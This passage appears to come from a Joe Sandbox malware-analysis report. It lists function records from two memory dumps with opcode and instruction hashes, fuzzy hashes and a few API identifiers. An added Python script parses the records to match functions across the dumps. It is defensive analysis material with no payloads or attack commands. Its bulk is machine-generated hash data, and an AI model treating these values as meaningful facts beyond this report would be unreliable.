• Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction ID: 8d58df49f5d26529fbe7367cd5e425c053bc4c46518050ed1f987ae9882f9d76
• Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
• Instruction Fuzzy Hash: B911C63BA091D50EC7168D3C8400579BFE30A93535B29C3DEF4B49B2D2C6238D8A8760

Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
• Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
• Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
• Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA

Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
• Instruction ID: dc553325a8e6631a22f4eb1b47f9b9307813544eab282f02fb030ddad6cf930c
• Opcode Fuzzy Hash: babb52ce3867e81688af6e2cbfc925ee92a6f3f8cd139ab93b6cbf9c46b7bedb
• Instruction Fuzzy Hash: 180171F160030187EB22AE6585C1B77B6F96F82715F18452EDB0A57300DB76E815CEB5

Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
• Instruction ID: 5e94d896eb3e17ad29e6d7673a861a027fb9c7f82995a6f2207671aa435dab1a
• Opcode Fuzzy Hash: 08b4345849cd0f47e80d1ed5c22eab79d945ad8a979d27bd12cd0f1252f48fec
• Instruction Fuzzy Hash: 3D11E2367543404BD718CF68D8E06BFB3E19B86301F99543E9482C3390CBB8C9068B46

Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
• Instruction ID: d3f395a3666704a597fe5cd152006ad51eb89866d7b0aff70ef20e2f81c0ad7d
• Opcode Fuzzy Hash: 358e2d3b4c42a0c731e3efba7596486553403020c12b89a5f8a1758b9ddfefcd
• Instruction Fuzzy Hash: 50112B7D6042005BD3509F29DD80E3BB7EAEBD6700F36D43EE68057251DB30C8529756

Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                            • Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                            • Instruction ID: 96776e6ca58e4aa10d5ba030708700e1f4611ba1bbc7aad69bbda72d62d4017c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD11E7747407804FD7158F28CCD5E627B63AB86318719853EA8429BB92C66CAC05CB64
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                            • Instruction ID: 0e8f66d183fe9e14be1779e28ad330ba7fcea72684f28741df0ac43413b1dcca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5611A071608341ABD724DF29DDA077FBBE2EBC6254F15AE2CE59653791C630C841CB0A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                            • Instruction ID: 36e37f5184ae6b5f12f1d3ae35ca6bd396f784eb5bf305c7c25848572748988b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20F06DB5E0C3808BC718CF28C44066AFBE5AB9A700F10A93ED48AA3341DB31D545CB4A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                            • Instruction ID: dafb754127db889cc387327b81ff0c84183e6fb29f7d1198a0a26455a67b0274
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F069B410D3919FC300DF29D29051BFFE0ABD5318F64EA5CE8DA5B212D334C5028B4A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                            • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                            • Instruction ID: bf3276d5db2ddd71b26ab661fc93688d98b36442342a27f76758d7edce35ef5b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52F0EDB5A88301BEF6249A01CC43F6BB6B49B55B04F30152DB344790E0F5E1B5498B0E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                            • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
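The records above are the raw Joe Sandbox function-analysis listing, and what a practitioner usually wants from them is a pivot: which Opcode IDs occur both in the PE-backed dump at 00400000 and in the non-PE region at 02490000, since a function body present in both is the natural anchor for matching the unpacked code back to the on-disk module. The parser below is an added example, not part of the report or of Joe Sandbox. Its input is a constructed excerpt copied (abridged for the second and third records) from three records on this page; the field names are exactly those printed in the records; and the grouping treats the Opcode ID as the stable key only because, in the records shown, it repeats across dumps while the Instruction ID changes, which is an observation about this listing rather than a documented property of the hash.

```python
"""Parse Joe Sandbox function-analysis records and correlate them across memory dumps.
Added example, not part of the report; SAMPLE_RECORDS is a constructed excerpt
copied from three records on this page so the script runs offline."""
import re
from collections import defaultdict

SAMPLE_RECORDS = """\
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
• Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
• Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
• Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
• Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
• Instruction ID: 96776e6ca58e4aa10d5ba030708700e1f4611ba1bbc7aad69bbda72d62d4017c
• Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
• Instruction Fuzzy Hash: DD11E7747407804FD7158F28CCD5E627B63AB86318719853EA8429BB92C66CAC05CB64
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
• Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
• Instruction ID: 0e8f66d183fe9e14be1779e28ad330ba7fcea72684f28741df0ac43413b1dcca
• Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
• Instruction Fuzzy Hash: 5611A071608341ABD724DF29DDA077FBBE2EBC6254F15AE2CE59653791C630C841CB0A
"""

RECORD_START = "Memory Dump Source"
FIELD_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
SOURCE_RE = re.compile(
    r"^(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)$"
)


def parse_records(text):
    """Split the listing into one dict per 'Memory Dump Source' record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == RECORD_START:
            cur = {}
            records.append(cur)
        elif cur is not None and (m := FIELD_RE.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            if key == "Source File":
                sm = SOURCE_RE.match(value)
                if sm is None:
                    raise ValueError(f"unexpected Source File line: {value!r}")
                cur.update(source_file=sm["file"], offset=int(sm["offset"], 16),
                           based_on_pe=sm["pe"] == "true")
            else:
                cur[key] = value or None  # empty fields such as "API ID:" become None
        # bare headers ("Joe Sandbox IDA Plugin", "Yara matches", "Similarity") carry no value
    return records


def group_by_opcode_id(records):
    """Opcode ID -> set of dump base offsets in which that function body was seen."""
    groups = defaultdict(set)
    for r in records:
        if r.get("Opcode ID") and "offset" in r:
            groups[r["Opcode ID"]].add(r["offset"])
    return dict(groups)


def shared_across_dumps(records):
    """Opcode IDs that occur in more than one dump (e.g. PE-backed 00400000 and non-PE 02490000)."""
    return sorted(oid for oid, offs in group_by_opcode_id(records).items() if len(offs) > 1)


def instruction_ids_for(records, opcode_id):
    """Distinct Instruction IDs reported for one Opcode ID."""
    return {r["Instruction ID"] for r in records if r.get("Opcode ID") == opcode_id}


def consistency_issues(records):
    """Sanity checks: both IDs are 64 hex digits and Opcode Fuzzy Hash equals Opcode ID."""
    hex64 = re.compile(r"^[0-9a-fA-F]{64}$")
    issues = []
    for i, r in enumerate(records):
        for key in ("Opcode ID", "Instruction ID"):
            if not hex64.match(r.get(key) or ""):
                issues.append(f"record {i}: {key} is not a 64-digit hex value")
        if r.get("Opcode Fuzzy Hash") != r.get("Opcode ID"):
            issues.append(f"record {i}: Opcode Fuzzy Hash differs from Opcode ID")
    return issues


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for oid in shared_across_dumps(recs):
        offs = ", ".join(f"{o:08X}" for o in sorted(group_by_opcode_id(recs)[oid]))
        print(f"{oid[:16]}... seen in dumps {offs}; "
              f"{len(instruction_ids_for(recs, oid))} Instruction ID variant(s)")
    print("consistency issues:", consistency_issues(recs) or "none")
```

Run it on a full report by replacing SAMPLE_RECORDS with the copied listing; it needs Python 3.8 or later. Offsets are kept as integers so they can be compared with the base addresses in the memory-dump filenames, and the consistency check exists because a copied listing with a mangled hash line would otherwise silently fall out of every group.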

Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                            • Instruction ID: e9e37191ca131b7bd35de4a38a45ac0981d22013e653bb1db83e87ad9d4c0b5e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F0A739B456808BE704CF38E82195BBBE2E387228F145A7DD641D3751DB39C8018605
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                            • Instruction ID: 125372f5d3b68d82b85b5642a72c563733b032824caca2ff8a440a1607dfe248
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D5D05E2590C67A824A2B4E1805501FEA72A4F03515B0B75E6DCE1BF682DBE6C9476278
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                            • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                            • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                            • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: ($P$W$]$j$x
• API String ID: 2832541153-1642767450
• Opcode ID: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
• Instruction ID: d10a51e23ecba45016217ad21913f42ff9d133ebe453f27826f30668db2baec2
• Opcode Fuzzy Hash: 8b1f1a14f2ecd6cbcc61cef173fb78c483c4298edd8ed21dbcc155f4e5603572
• Instruction Fuzzy Hash: B941A17050C7818ED301AFB8D88835FBEE0AB8A314F444A7EE4E9963D2D678854DC797
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
• String ID: ($P$W$]$j$x
• API String ID: 2832541153-1642767450
• Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
• Instruction ID: 1209ac60c52be1ee3d2609d382f462b43dac307b6badfe25585f3bede4718c51
• Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
• Instruction Fuzzy Hash: 61418E7050C7818FD341AF7C988836FBEE09F86314F084A7EE4DA86392D6788549C797
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
• Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
• Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
• Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID: Variant$ClearInit
• String ID: L
• API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                            • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                            • Instruction ID: 3ad9b868c03ac49d6ff77bb70abfbb19bf88551a758c6b1064517cd83c371392
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF412B7110CBC18ED321DB38845869EBFD16FE6220F188A9DE5F5873E2D674854ACB53
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                            • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                            • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86